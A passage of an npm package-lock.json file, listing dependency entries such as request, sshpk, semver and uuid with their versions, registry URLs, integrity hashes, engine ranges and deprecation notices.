"sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": 